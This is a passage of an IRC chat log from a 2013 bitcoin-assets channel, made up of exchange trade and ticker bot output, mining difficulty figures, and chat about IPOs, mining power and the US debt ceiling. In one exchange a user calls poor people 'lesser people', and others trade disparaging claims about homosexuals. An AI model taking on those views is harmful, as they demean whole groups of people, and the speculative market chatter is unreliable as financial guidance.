ofcourse, once the secret is released, the holders of the keys get to see it first Oct 14 15:48:48 before the global press etc Oct 14 16:14:33 [HAVELOCK] [AM1] 13 @ 0.66223078 = 8.609 BTC [-] {3} Oct 14 16:17:24 ;;ticker Oct 14 16:17:24 MtGox BTCUSD ticker | Best bid: 151.00000, Best ask: 151.41001, Bid-ask spread: 0.41001, Last trade: 151.00000, 24 hour volume: 33087.00526892, 24 hour low: 143.10000, 24 hour high: 153.69902, 24 hour vwap: 148.83173 Oct 14 16:20:41 !ticker s.mpoe Oct 14 16:20:41 How can I be of assistance, my poor man? Oct 14 16:21:05 ;;ticker s.mpoe Oct 14 16:21:05 (ticker [--bid|--ask|--last|--high|--low|--avg|--vol] [--currency XXX] [--market |all]) -- Return pretty-printed ticker. Default market is Mtgox. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure the code (1 more message) Oct 14 16:28:08 $vwap s.mpoe Oct 14 16:28:10 mircea_popescu: S.MPOE 1 day: average: 0.00085005 high: 0.0008576 low: 0.00084444 volume: 42500 btc: 36.12705707 7 day: average: 0.00084643 high: 0.00085779 low: 0.00083547 volume: 912159 btc: 772.07450746 30 day: average: 0.00089086 high: 0.00094307 low: 0.0007725 volume: 4521469 btc: 4027.99396016 Oct 14 17:01:12 thanks mp, was reading on of your articles on MPOE evaluation and tried the !ticker command Oct 14 17:01:46 just discovered the The list of discontinued assets on MPEx page ! Oct 14 17:05:44 :p Oct 14 17:05:50 !ticker m s.bbet Oct 14 17:05:51 [MPEX:S.BBET] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.00050025 / 0.0005293 / 0.00059999 (7055 shares, 3.73 BTC), 30D: 0.0005 / 0.00054634 / 0.00059999 (43300 shares, 23.66 BTC) Oct 14 17:12:54 ;;nethash Oct 14 17:12:55 2217153.74554 Oct 14 17:13:10 ;;diffchange Oct 14 17:13:11 Estimated percent change in difficulty this period | 33.36436 % based on data since last change | 63.63379 % based on data for last three days Oct 14 17:16:17 that diff Oct 14 17:22:39 [HAVELOCK] [CBTC] 3888 @ 0.0002479 = 0.9638 BTC [-] Oct 14 17:25:42 [HAVELOCK] [AM1] 30 @ 0.65974999 = 19.7925 BTC [-] {7} Oct 14 17:27:38 ;;bcstats Oct 14 17:27:41 Current Blocks: 263611 | Current Difficulty: 1.8928124928103292E8 | Next Difficulty At Block: 264095 | Next Difficulty In: 484 blocks | Next Difficulty In About: 1 day, 23 hours, 36 minutes, and 23 seconds | Next Difficulty Estimate: 252338232.77 | Estimated Percent Change: 33.31391 Oct 14 17:29:01 hey tat, assuming havelock closes it's door to us issuers, too. what would you do then? Oct 14 17:38:23 we have contigency plans in place Oct 14 17:38:45 contingency* Oct 14 17:55:11 [HAVELOCK] [AM100] 39 @ 0.006287 = 0.2452 BTC [-] Oct 14 18:05:44 https://bitcointalk.org/index.php?topic=310282.msg3317569 another "signature based auth/login system" Oct 14 18:05:46 SQRL: revolutionizes web site login and authentication Oct 14 18:06:19 hi guys Oct 14 18:15:31 [HAVELOCK] [CFIG] 3 @ 0.10293331 = 0.3088 BTC [+] {3} Oct 14 18:20:12 http://www.theverge.com/2013/10/14/4836778/canadian-government-we-want-to-unbundle-television-channels Oct 14 18:20:13 Canadian government: 'We want to unbundle television channels' | The Verge Oct 14 18:20:29 canada keep being the anti-US plz Oct 14 18:42:48 canadian government is acting really, really strangely lately Oct 14 18:42:58 [HAVELOCK] [SMG] 14052 @ 0.00017036 = 2.3939 BTC [-] {14} Oct 14 18:42:58 like, suspiciously consumer-friendly Oct 14 18:50:05 [HAVELOCK] [AM100] 100 @ 0.006111 = 0.6111 BTC [-] {5} Oct 14 18:55:10 [HAVELOCK] [AM1] 5 @ 0.65752 = 3.2876 BTC [-] {3} Oct 14 18:55:11 [HAVELOCK] [AM100] 148 @ 0.00611005 = 0.9043 BTC [-] {4} Oct 14 18:56:11 [HAVELOCK] [AM100] 54 @ 0.00611005 = 0.3299 BTC [-] Oct 14 19:02:17 [HAVELOCK] [B] [XBOND] 85 @ 0.001199 = 0.1019 BTC [-] Oct 14 19:26:41 [HAVELOCK] [AM1] 1 @ 0.70999999 BTC [+] Oct 14 19:27:42 [HAVELOCK] [HIM] 6 @ 0.04500167 = 0.27 BTC [-] {2} Oct 14 19:30:45 [HAVELOCK] [AM1] 6 @ 0.71 = 4.26 BTC [+] {2} Oct 14 19:46:00 [MPEX] [S.MG] 13600 @ 0.00018 = 2.448 BTC [-] {2} Oct 14 20:17:31 [HAVELOCK] [LABCO] 850 @ 0.00043798 = 0.3723 BTC [+] {4} Oct 14 20:30:44 [MPEX] [S.MPOE] 7700 @ 0.00084656 = 6.5185 BTC [-] {2} Oct 14 21:04:10 http://www.youtube.com/watch?v=N4eCqcXjlX4 Oct 14 21:04:10 Au demolat-o - YouTube Oct 14 21:04:15 romanian expert techniques. Oct 14 21:10:24 [HAVELOCK] [AM100] 200 @ 0.00645 = 1.29 BTC [-] Oct 14 22:03:15 [HAVELOCK] [AM100] 28 @ 0.0065 = 0.182 BTC [+] Oct 14 22:24:36 [HAVELOCK] [B] [XBOND] 5000 @ 0.00116222 = 5.8111 BTC [-] {2} Oct 14 22:34:46 [HAVELOCK] [AM100] 42 @ 0.00645228 = 0.271 BTC [-] {3} Oct 14 22:40:52 [HAVELOCK] [AM1] 4 @ 0.71898988 = 2.876 BTC [+] {2} Oct 14 22:41:53 [HAVELOCK] [AM100] 192 @ 0.00679972 = 1.3055 BTC [+] {2} Oct 14 23:05:16 [HAVELOCK] [B] [XBOND] 122 @ 0.00116151 = 0.1417 BTC [-] Oct 14 23:06:17 [HAVELOCK] [AM100] 26 @ 0.0069999 = 0.182 BTC [+] Oct 14 23:12:30 .d Oct 14 23:12:30 189281249.28103 | Next Diff in 425 blocks | Estimated Change: 34.1303% in 1d 22h 27m 50s Oct 14 23:52:29 ;;24hprc Oct 14 23:52:30 Error: "24hprc" is not a valid command. Oct 14 23:53:02 ;;bc,24hprc Oct 14 23:53:04 142.87 Oct 15 00:07:17 [HAVELOCK] [AM1] 1 @ 0.7 BTC [-] Oct 15 00:12:01 mircea_popescu: so tomorrow there will basically be a sell order for 100m s.nsa at 0.0001 that will stay up until the 20th and then be removed? Oct 15 00:16:46 pretty much Oct 15 00:25:35 [HAVELOCK] [AM1] 10 @ 0.73249999 = 7.325 BTC [+] {5} Oct 15 00:42:52 [HAVELOCK] [HIM] 7 @ 0.06398 = 0.4479 BTC [+] Oct 15 00:46:56 [HAVELOCK] [HIM] 7 @ 0.06398 = 0.4479 BTC [+] Oct 15 00:53:02 [HAVELOCK] [HIM] 85 @ 0.05 = 4.25 BTC [-] Oct 15 00:56:05 [HAVELOCK] [HIM] 4 @ 0.06398999 = 0.256 BTC [+] Oct 15 01:15:23 [HAVELOCK] [AM100] 59 @ 0.00697 = 0.4112 BTC [-] Oct 15 01:25:05 [HAVELOCK] [B] [XBOND] 747 @ 0.00119998 = 0.8964 BTC [+] {3} Oct 15 01:36:45 [HAVELOCK] [DEALCO] 150 @ 0.00699999 = 1.05 BTC [+] {2} Oct 15 01:36:46 [HAVELOCK] [VTX] 3 @ 0.42 = 1.26 BTC [-] Oct 15 01:38:47 [HAVELOCK] [VTX] 2 @ 0.42 = 0.84 BTC [-] Oct 15 01:38:48 [HAVELOCK] [DEALCO] 150 @ 0.007 = 1.05 BTC [+] Oct 15 01:39:48 [HAVELOCK] [VTX] 1 @ 0.42 BTC [-] Oct 15 01:55:16 http://bitbet.us/bet/519/btc-network-difficulty-to-top-1b-before-2014/ Oct 15 01:55:18 BitBet - BTC network difficulty to top 1B before 2014 Oct 15 01:55:18 sorta even odds. Oct 15 01:55:35 what's asicminer worth at 1bn diff ? Oct 15 01:57:10 42 Oct 15 01:58:35 for that matter how many hashes is 1bn Oct 15 01:58:58 42 Oct 15 01:59:01 http://bitcoin.sipa.be/speed-lin-ever.png Oct 15 01:59:04 heh. look at THAT Oct 15 01:59:21 i recall the days when there were ups and down, those bumps you can barely see now Oct 15 01:59:50 that's quite the graph Oct 15 01:59:58 so 1bn diff is like 7peta hash/s Oct 15 02:00:39 people will still be mining with block erupters Oct 15 02:01:46 http://en.wikipedia.org/wiki/TOP500 Oct 15 02:01:55 the fastest computer in the world does like 33tflops Oct 15 02:02:04 there's what, like 7 flops to the hash ? Oct 15 02:02:38 basically bitcoin is currently drinking more computing power than all the rest of the computing world combined or some shit. Oct 15 02:02:47 so when can the nethash start cracking into bank accounts? Oct 15 02:03:01 42 Oct 15 02:03:03 (hours) Oct 15 02:03:21 i suppose this is the part us "regulators" will have to figure out soon enough : Oct 15 02:03:37 don't piss off btc or else you may not have two codes left standing together. Oct 15 02:25:33 [HAVELOCK] [AM100] 16 @ 0.00697 = 0.1115 BTC [-] Oct 15 02:25:34 [HAVELOCK] [HIM] 30 @ 0.06398999 = 1.9197 BTC [+] Oct 15 02:34:42 [HAVELOCK] [CBTC] 12639 @ 0.00020643 = 2.6091 BTC [-] {4} Oct 15 02:35:43 [HAVELOCK] [CBTC] 2951 @ 0.00019662 = 0.5802 BTC [-] {5} Oct 15 02:37:45 [HAVELOCK] [CBTC] 15540 @ 0.00018095 = 2.812 BTC [-] {8} Oct 15 02:38:46 [HAVELOCK] [NEOBEE] 337 @ 0.0022 = 0.7414 BTC [+] {2} Oct 15 02:46:53 [HAVELOCK] [AM1] 1 @ 0.703 BTC [-] Oct 15 03:06:51 http://op-co.de/blog/posts/android_ssl_downgrade/ Oct 15 03:06:52 Why Android SSL was downgraded from AES256-SHA to RC4-MD5 in late 2010 Oct 15 03:15:28 http://cmd.fm/ Oct 15 03:15:32 this is cool Oct 15 03:27:33 [HAVELOCK] [AM100] 231 @ 0.00692115 = 1.5988 BTC [+] {5} Oct 15 03:28:34 [HAVELOCK] [AM100] 66 @ 0.00699989 = 0.462 BTC [+] {2} Oct 15 03:28:36 [HAVELOCK] [CBTC] 5000 @ 0.000181 = 0.905 BTC [+] Oct 15 03:54:00 [HAVELOCK] [AM100] 181 @ 0.00674767 = 1.2213 BTC [-] {5} Oct 15 03:59:05 [HAVELOCK] [AM100] 257 @ 0.00677096 = 1.7401 BTC [+] {2} Oct 15 04:05:11 [HAVELOCK] [AM100] 93 @ 0.0068 = 0.6324 BTC [+] Oct 15 04:15:21 [MPEX] [S.MPOE] 4500 @ 0.000844 = 3.798 BTC [-] Oct 15 04:45:50 [HAVELOCK] [AM100] 36 @ 0.00670001 = 0.2412 BTC [-] Oct 15 04:58:02 [MPEX] [S.MPOE] 2150 @ 0.00084398 = 1.8146 BTC [-] {2} Oct 15 05:10:14 [HAVELOCK] [AM100] 28 @ 0.00671001 = 0.1879 BTC [+] Oct 15 05:35:46 when kraken fund went bust http://25.media.tumblr.com/9dcbfb570e27476b56d967de85d75488/tumblr_mk2vczTeQg1ql2603o1_500.gif **** BEGIN LOGGING AT Wed Oct 16 06:48:14 2013 Oct 16 06:54:25 ;;bc,stats Oct 16 06:54:27 Current Blocks: 264003 | Current Difficulty: 1.8928124928103292E8 | Next Difficulty At Block: 264095 | Next Difficulty In: 92 blocks | Next Difficulty In About: 8 hours, 31 minutes, and 30 seconds | Next Difficulty Estimate: 264833073.563 | Estimated Percent Change: 39.91511 Oct 16 06:59:48 [MPEX] [S.NSA] 2436400 @ 0.0001 = 243.64 BTC {12} Oct 16 07:00:49 [MPEX] [S.NSA] 501000 @ 0.0001 = 50.1 BTC {2} Oct 16 07:00:49 [HAVELOCK] [AM1] 1 @ 0.67 BTC [-] Oct 16 07:03:49 so s.nsa ipo is a definite. Oct 16 07:04:07 congrats to teh team. Oct 16 07:05:54 [HAVELOCK] [AM100] 40 @ 0.00554 = 0.2216 BTC [-] Oct 16 07:07:40 i miss ipo spam Oct 16 07:08:04 So sad no S.NSA spam Oct 16 07:08:53 hooray Oct 16 07:08:57 [HAVELOCK] [AM100] 54 @ 0.00553001 = 0.2986 BTC [-] {2} Oct 16 07:08:59 ya srsly. ou sont les spams d'antan! Oct 16 07:09:58 [HAVELOCK] [AM100] 33 @ 0.00553001 = 0.1825 BTC [-] Oct 16 07:13:01 [MPEX] [S.NSA] 49575 @ 0.0001 = 4.9575 BTC Oct 16 07:25:13 [HAVELOCK] [AM100] 499 @ 0.00555 = 2.7695 BTC [+] Oct 16 07:27:15 [HAVELOCK] [VTX] 1 @ 0.37012003 BTC [-] **** BEGIN LOGGING AT Wed Oct 16 13:19:01 2013 Oct 16 13:20:50 ;;later tell benkay http://crossmap.christianpost.com/news/german-officials-return-homeschooled-children-to-dirk-wunderlich-family-on-condition-of-school-attendance-5255 Oct 16 13:20:51 The operation succeeded. Oct 16 13:21:05 do not confuse europe with the us depiction thereof. Oct 16 13:26:30 "The Wunderlich children were returned after the parents promised they would send their children back to a state school" so? they're still stealing children Oct 16 13:27:27 pankkake: you won't believe what slovak catholic bigots came up with Oct 16 13:27:46 what? Oct 16 13:27:46 pankkake well, in germany you gotta send kids to school. Oct 16 13:27:47 not just stealing children, but they supposedly give them for adoption to homosexuals Oct 16 13:27:54 lol Oct 16 13:27:54 you don't, however, have to live in germany. Oct 16 13:28:06 and also, they are teaching them to masturbate in norway or so Oct 16 13:28:30 that's like teaching to breathe Oct 16 13:29:06 and teching the homosexuality, zoophilia etc, of course Oct 16 13:30:31 mircea_popescu: I'm curious to know what your opinion is on the US debt default tomorrow Oct 16 13:30:33 that's gonna be interesting :P Oct 16 13:30:57 it doesn't default dood. Oct 16 13:31:18 I thought because the government hasn't been issued funding, they are unable to make this months payments on the bond, which is a default, no? Oct 16 13:31:26 the situation ios like this : each state has some income as tax receipts, and some expenses. in actual reality, the first claim to tax receipts goes to servicing the debt. Oct 16 13:31:46 in pseudo-lala crack cocaine pipedream the libertards in the us are living in, the first claim goes to welfare programs. Oct 16 13:32:05 by their distorted reasoning, as there's not enough tax income to satisfy both of these, there will be a default. Oct 16 13:32:20 I see Oct 16 13:32:20 [HAVELOCK] [VTX] 1 @ 0.37012001 BTC [-] Oct 16 13:32:25 in actual reality, there will be no default, just the various "paying poor people to vote democrat" programs will collapse. Oct 16 13:32:28 so you think they'll pay off the debt, and cut welfare? Oct 16 13:32:28 so, no more food stamps. Oct 16 13:32:34 no more health insurance. etc. Oct 16 13:32:36 yep. Oct 16 13:32:44 they already cut out food stamps for like, a day. Oct 16 13:32:52 interesting, that was certainly one of the scenarios I came up with Oct 16 13:32:57 so good for you. Oct 16 13:33:11 xD Oct 16 13:33:17 lucky me I don't depend on welfare any more, I guess. Oct 16 13:33:18 no state HAS TO pay the poor. the poor are always last in line, and for very good reason : they're lesser people. Oct 16 13:33:23 indeed. Oct 16 13:34:13 http://www.zerohedge.com/article/dagong-rating-agency-us-has-already-defaulted Oct 16 13:34:15 Dagong Rating Agency: "The US Has Already Defaulted" | Zero Hedge Oct 16 13:34:32 in 1967 or so Oct 16 13:36:24 what, the nixon gold thing ? Oct 16 13:36:54 anyway, i don't believe welfare is more than small % of us budget Oct 16 13:37:23 so it wont make a difference Oct 16 13:39:01 how likely is it that the usa goes broke tomorrow and will the be the end of teh world? Oct 16 13:39:49 oh, the world already ended in 1989 in ussr breakdown Oct 16 13:39:55 you didnt get the memo Oct 16 13:40:40 hehe Oct 16 13:41:05 jurov it's about a 40% Oct 16 13:42:48 mircea_popescu, maybe they'll pay the debt off to the chinese Oct 16 13:42:54 by inflating their currency Oct 16 13:43:15 cause that worked for germany and all :) Oct 16 13:43:38 Perlboy nope. tried past 5 yeas, the problem is everyone will devalue. Oct 16 13:44:05 although not having social welfare seems a bit of a fools errand. Oct 16 13:44:36 social welfare work schemes seem more logical Oct 16 13:44:44 which i don't believe the u.s. has Oct 16 13:46:11 pankkake: http://www.zerohedge.com/article/dagong-rating-agency-us-has-already-defaulted did you see the date? Oct 16 13:46:46 yes, it's the fun part Oct 16 13:47:03 ah i see :)= Oct 16 13:48:36 [HAVELOCK] [AM1] 1 @ 0.6785 BTC [+] Oct 16 13:59:37 http://trilema.com/2013/things-that-matter-these-days-things-that-dont-matter-these-days/ Oct 16 13:59:38 Things that matter these days ; things that don’t matter these days. pe Trilema - Un blog de Mirce Oct 16 13:59:46 ^ recommended reading. Oct 16 13:59:54 inb4 boobs Oct 16 14:03:06 just penis. Oct 16 14:03:17 close enough xD Oct 16 14:03:26 but yea, I was around for all that shit too Oct 16 14:03:50 the massive GPU difficulty spike, then the massive FPGA difficulty spike, and the Mt. Gox hack that dropped the exchange rate to practically zero Oct 16 14:04:16 mircea_popescu: I'm dubious as to if a difficulty spike of this magnitude will happen again for a while now though - we've jumped through all iterations of current technology Oct 16 14:04:30 there is no next step, in terms of mining hardware, it's just making gradual improvements to the ASICs Oct 16 14:04:44 we've not jumped through actual mass adoption. if you grep the logs for last month's discussion about hashing bathroom tiles... Oct 16 14:05:13 haha Oct 16 14:05:44 you know, for house heating. Oct 16 14:06:01 that'd be pretty cool, I'm pretty much heating my house off of 3 x SC Single atm Oct 16 14:06:14 but it only does the one room. Oct 16 14:06:51 but yea, I reckon that scenario is a long way away Oct 16 14:07:03 public adoption in general takes many years. Oct 16 14:07:41 "a long way away". Oct 16 14:07:45 5 years ? Oct 16 14:07:52 I'd think more like 10 Oct 16 14:08:01 well here's the thing : i'll be around in 10 years. Oct 16 14:08:08 me too hopefully xD Oct 16 14:08:19 and i'll look at the new graph and say... hey... i remember when i was discussing with azelphur Oct 16 14:08:20 hehe Oct 16 14:08:31 haha yea, prolly will Oct 16 14:08:53 now if the exchange rate would just hurry up and do that again Oct 16 14:09:11 lol Oct 16 14:11:03 :D Oct 16 14:14:08 mircea_popescu: your units are off.. all those super computers are messured in petaflop/s, not terraflop/s Oct 16 14:14:55 33,862.7 Oct 16 14:15:04 Tianhe-2 - 33 TFLOPS Oct 16 14:15:09 could one of those supercomputers 51% attack litecoin? Oct 16 14:15:10 hah. people using fucking commas the wrong way Oct 16 14:15:41 replace all T with a P and you're fine Oct 16 14:17:21 and i suggest to assume FLOP = HASHOP or so.. both are "special" and would take many more regular ALUops Oct 16 14:17:59 dexX7 made some edits :[ Oct 16 14:18:17 :( sorry Oct 16 14:18:23 but no, the flop = hashop equality is nonsense. Oct 16 14:18:48 why? Oct 16 14:18:53 even if you take "full hardware implementation" : you can easy fit 1000 flop cores in the space a hashcore takes Oct 16 14:19:02 like, on physical silicon. Oct 16 14:19:22 i mean, obviously you can make cores that do sqrt(x) in one cycle Oct 16 14:19:33 that doesn't make sqrt(x) = X*2 Oct 16 14:19:39 ah, good to know Oct 16 14:20:01 in the end i guess this woud be the one base conversion factor, sqA of silicon space. Oct 16 14:20:04 didn't know that flops are so much easier than hashops Oct 16 14:20:18 well a shashop is 2 sha-256 hashings Oct 16 14:20:44 http://www.movable-type.co.uk/scripts/sha256.html Oct 16 14:20:46 JavaScript Implementation of SHA-256 Cryptographic Hash Algorithm | Movable Type Scripts Oct 16 14:20:51 that's a js sample sha-256 implementation Oct 16 14:23:10 i see Oct 16 14:41:26 thanks MP for your most recent article_ Oct 16 14:42:39 i like it too. Oct 16 14:44:02 bitesak actually... ima put that in the trilema bylines :D Oct 16 14:57:44 [HAVELOCK] [NEOBEE] 150 @ 0.0025 = 0.375 BTC [+] Oct 16 15:00:47 [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Oct 16 15:01:59 is it reasonable to argue it is in China's interest to support and accumulate bitcoins as a hedge and part of an exit of their dwindling USD base as well as precipating even faster the demise of the dollar? Oct 16 15:02:17 perhaps. Oct 16 15:02:26 what about boinc ? it reports 8.8 petaflops of compute over the last 24hours : https://boinc.berkeley.edu/ Oct 16 15:02:55 Troic i used the http://www.top500.org/lists/2013/06/ list Oct 16 15:03:14 conceivably it's not 100% accurate, but gotta use something Oct 16 15:07:52 mp: re: recent article. just wow. Oct 16 15:08:06 post @ tri Oct 16 15:08:09 yee Oct 16 15:08:25 ;;bc,stats Oct 16 15:08:27 Current Blocks: 264093 | Current Difficulty: 1.8928124928103292E8 | Next Difficulty At Block: 264095 | Next Difficulty In: 2 blocks | Next Difficulty In About: 11 minutes and 42 seconds | Next Difficulty Estimate: 267614155.975 | Estimated Percent Change: 41.3844 Oct 16 15:08:53 not even 42! Oct 16 15:09:01 lmao Oct 16 15:09:09 epic. how the fuck does that go Oct 16 15:09:13 !b 5 Oct 16 15:09:15 Last 5 lines bashed and pending review. (http://dpaste.com/1418823/plain/) Oct 16 15:09:52 oh, nice feature Oct 16 15:10:18 #bitcoin-assets, leading the way in irc innovation. Oct 16 15:10:22 we got bots to do everything. Oct 16 15:13:44 mircea_popescu, is there evidence that the chinese and /or the US are mining? Oct 16 15:14:00 [HAVELOCK] [AM1] 12 @ 0.582 = 6.984 BTC [-] Oct 16 15:15:34 besides "Estimated Percent Change: 41.3844" :P Oct 16 15:16:02 [HAVELOCK] [AM100] 80 @ 0.0056 = 0.448 BTC [-] Oct 16 15:16:02 yeah. not public, but there is. Oct 16 15:17:20 https://blockchain.info/block-height/264096 Oct 16 15:17:29 RIP mining Oct 16 15:18:01 Scrat what about that block ? Oct 16 15:18:29 new diff - 267.7 M Oct 16 15:18:33 a a. yea Oct 16 15:18:58 267.6 estimate earlier proves correct >D Oct 16 15:23:09 [HAVELOCK] [AM1] 2 @ 0.64779999 = 1.2956 BTC [+] Oct 16 15:23:36 ;;ticker Oct 16 15:23:37 MtGox BTCUSD ticker | Best bid: 161.30001, Best ask: 161.50000, Bid-ask spread: 0.19999, Last trade: 161.50000, 24 hour volume: 26035.62247003, 24 hour low: 151.20000, 24 hour high: 163.00000, 24 hour vwap: 157.69910 Oct 16 15:24:43 .d Oct 16 15:24:43 267731249.48242 | Next Diff in 2015 blocks | Estimated Change: -99.9300% in 27d 23h 17m 17s Oct 16 15:24:52 ha! -99.93% ! 11 Oct 16 15:24:57 please be true! Oct 16 15:24:59 sell all the bitcoinz Oct 16 15:25:21 ;;prevdiffchange Oct 16 15:25:26 41.44626 Oct 16 15:41:27 ;;bc,stats Oct 16 15:41:27 [HAVELOCK] [VTX] 1 @ 0.37012001 BTC [-] Oct 16 15:41:29 Current Blocks: 264099 | Current Difficulty: 2.677312494824211E8 | Next Difficulty At Block: 266111 | Next Difficulty In: 2012 blocks | Next Difficulty In About: 1 week, 1 day, 4 hours, 17 minutes, and 33 seconds | Next Difficulty Estimate: 459625014.277 | Estimated Percent Change: 71.67403 Oct 16 15:41:52 459625014.277 Oct 16 15:41:54 herp Oct 16 15:42:52 can't be accurate so soon Oct 16 15:43:03 what if it is. Oct 16 15:43:14 that would be fun Oct 16 15:43:26 China mining hard... Oct 16 15:43:39 i can't wait for all the something awful butthurt ensuing Oct 16 15:43:46 "o these mean bitcoin people, they dont Oct 16 15:43:54 too soon, no? cointerra, vmc and hashfast are shipping when? next month? Oct 16 15:44:03 ' give a shit what we think about it!!! you could heat all the poor african houses with all that electricity!!!" Oct 16 15:44:13 heh Oct 16 15:44:15 "why is it that resource allocation isn't done by a forum!" Oct 16 15:44:35 "why is it that resource allocation isn't done by a forum!" => that's what Ripple does :D Oct 16 15:44:55 except it has no resources to allocate. Oct 16 15:45:06 bitfury has orders to ship in the US I think Oct 16 15:46:19 I meant https://bitcointalk.org/index.php?topic=145506.0 - which at a time gave $100 worth to anyone with an account Oct 16 15:47:21 yeah. that worked so very well... Oct 16 15:49:43 ;;estimate Oct 16 15:49:44 Next difficulty estimate | 455842159.74 based on data since last change | 342070123.465 based on data for last three days Oct 16 15:50:41 indeed Oct 16 16:05:05 .d Oct 16 16:05:06 267731249.48242 | Next Diff in 2009 blocks | Estimated Change: 58.7302% in 5d 18h 5m 3s Oct 16 16:07:52 [MPEX] [S.MPOE] 2650 @ 0.00081596 = 2.1623 BTC [+] Oct 16 16:10:56 [MPEX] [O] [O.USD.C128T] 700 @ 0.35586239 = 249.1037 BTC [+] Oct 16 16:11:47 wow did the diff go from 180mil to 267mil or did I miss a diff change in between? Oct 16 16:12:13 ;;calc 180 *1.42 Oct 16 16:12:14 255.6 Oct 16 16:12:44 ystarnaud, diff change some hours ago Oct 16 16:12:52 hm i wonder if btc reaches 200 Oct 16 16:13:14 Apocalyptic: i know... but i was wondering if i missed a diff change somewhere or if it actually increased that much in 1 shot Oct 16 16:13:23 it did man, like 41.8% Oct 16 16:13:26 42% in one shoit Oct 16 16:13:28 thats nuts Oct 16 16:13:31 many people say the next bubble will go to 500 Oct 16 16:13:35 i'm not one of them Oct 16 16:13:50 $300 is a decent target Oct 16 16:13:59 200 is a decent target Oct 16 16:14:16 just as long as it doesn't do retarded shit like shoot up through 1k or w/e. Oct 16 16:14:28 lol Oct 16 16:14:59 you laugh now, but at some point it went from 15 to 260 Oct 16 16:15:08 ^^^ Oct 16 16:15:09 i know i was there Oct 16 16:15:17 i know you were hehe. Oct 16 16:15:52 anyway, off to see the dentist. may your next hours be less painful than mine. Oct 16 16:16:01 fun stuff Oct 16 16:16:03 good luck Oct 16 16:17:02 [HAVELOCK] [AM100] 20 @ 0.0058802 = 0.1176 BTC [+] {2} Oct 16 16:23:08 [HAVELOCK] [AM1] 134 @ 0.58175374 = 77.955 BTC [-] {5} Oct 16 16:26:49 as it is crazy times, chances of a 1000 rally and crash is possible Oct 16 16:27:12 [HAVELOCK] [AM100] 215 @ 0.00595997 = 1.2814 BTC [+] {10} Oct 16 16:27:13 why would it crash? Oct 16 16:27:55 because there is not enough economy to support that price. Oct 16 16:28:04 chart reading is self-fulfilling as well Oct 16 16:28:42 ^ bingo, bubbles pop. 1k is a bubble. Oct 16 16:29:14 [HAVELOCK] [AM1] 64 @ 0.55968748 = 35.82 BTC [-] {2} Oct 16 16:30:15 [HAVELOCK] [AM100] 191 @ 0.00512074 = 0.9781 BTC [-] {6} Oct 16 16:30:32 screwed either way, so enjoy the ride Oct 16 16:34:19 [HAVELOCK] [AM100] 33 @ 0.00495211 = 0.1634 BTC [-] {4} Oct 16 16:37:22 [HAVELOCK] [AM1] 6 @ 0.52760013 = 3.1656 BTC [-] {2} Oct 16 16:40:25 [HAVELOCK] [HIM] 50 @ 0.05158399 = 2.5792 BTC [-] {5} Oct 16 16:42:27 [HAVELOCK] [HIM] 4 @ 0.051 = 0.204 BTC [-] Oct 16 16:45:52 hi Oct 16 16:46:27 wow, 41% jump? Oct 16 16:47:21 That sneak up on you? Oct 16 16:47:53 ehh, i know ~38 was being predicted Oct 16 16:48:00 big psychological jump when it crosses 40 tho Oct 16 16:48:12 Is there? Oct 16 16:48:24 …yes? Oct 16 16:48:38 i mean, i said wow and everything! Oct 16 16:53:47 .n Oct 16 16:53:48 2459656.18063 Oct 16 16:53:50 .d Oct 16 16:53:50 267731249.48242 | Next Diff in 2001 blocks | Estimated Change: 72.1500% in 3d 20h 41m 2s Oct 16 16:54:40 [HAVELOCK] [NEOBEE] 60 @ 0.0025 = 0.15 BTC [+] Oct 16 17:01:46 [HAVELOCK] [AM1] 9 @ 0.59333332 = 5.34 BTC [+] {3} Oct 16 17:07:52 [HAVELOCK] [B] [XBOND] 500 @ 0.00115936 = 0.5797 BTC [-] {9} Oct 16 17:11:56 [HAVELOCK] [VTX] 2 @ 0.37012001 = 0.7402 BTC [-] Oct 16 17:12:57 [HAVELOCK] [SMG] 4901 @ 0.00017 = 0.8332 BTC [-] {2} Oct 16 17:25:09 [HAVELOCK] [AM1] 20 @ 0.64499999 = 12.9 BTC [+] {3} Oct 16 17:25:10 [HAVELOCK] [B] [XBOND] 1500 @ 0.00115165 = 1.7275 BTC [-] {6} Oct 16 17:25:52 ;;nethash Oct 16 17:25:53 2459656.18063 Oct 16 17:26:10 [HAVELOCK] [AM1] 6 @ 0.67375 = 4.0425 BTC [+] {2} Oct 16 17:52:11 If any of you all are in RentalStarter, it would be beneficial to join us at #rentalstarter to talk about an option for US investors, should we have any. Oct 16 17:58:42 [HAVELOCK] [AM100] 111 @ 0.00589315 = 0.6541 BTC [+] {4} Oct 16 18:00:44 [HAVELOCK] [LABCO] [PAID] 0.02096432 BTC to 40`316 shares, 52 satoshi per share Oct 16 18:02:47 [HAVELOCK] [HIM] 2 @ 0.051 = 0.102 BTC [+] Oct 16 18:03:24 Updated At 10:55 a.m. ET. Report: Deal Reached On Senate Side Oct 16 18:03:24 Republican Sen. Kelly Ayotte of New Hampshire tells The Associated Press that it's her understanding that Senate leaders have reached a deal and that a formal announcement was forthcoming. Oct 16 18:03:24 "I understand they've come to an agreement but I'm going to let the leader announce that," Ayotte said. Oct 16 18:03:40 http://www.npr.org/blogs/thetwo-way/2013/10/16/235263755/hours-ahead-of-debt-ceiling-congress-scrambles-for-a-deal Oct 16 18:03:40 Hours Ahead Of Debt Deadline, Senate Leaders Race To Reach Deal : The Two-Way : NPR Oct 16 18:06:50 [HAVELOCK] [CFIG] 2 @ 0.11349999 = 0.227 BTC [+] {2} Oct 16 18:10:05 http://money.cnn.com/2013/10/15/technology/twitter-nyse/ (and loses more money than ever) Oct 16 18:10:06 Twitter picks the NYSE - Oct. 15, 2013 Oct 16 18:17:00 [HAVELOCK] [AM1] 1 @ 0.6 BTC [-] Oct 16 18:22:00 Oracle and Twitter. Nice. Oct 16 18:22:07 Huge transfer and a huge IPO. Oct 16 18:31:15 [HAVELOCK] [AM100] 34 @ 0.00577941 = 0.1965 BTC [+] {2} Oct 16 18:31:16 [HAVELOCK] [AM1] 4 @ 0.6 = 2.4 BTC [-] Oct 16 18:35:19 [HAVELOCK] [VTX] 2 @ 0.37012 = 0.7402 BTC [-] Oct 16 18:37:21 [HAVELOCK] [B] [XBOND] 353 @ 0.00118944 = 0.4199 BTC [+] {4} Oct 16 18:38:22 [HAVELOCK] [B] [XBOND] 976 @ 0.00119 = 1.1614 BTC [+] Oct 16 18:57:03 mircea_popescu: 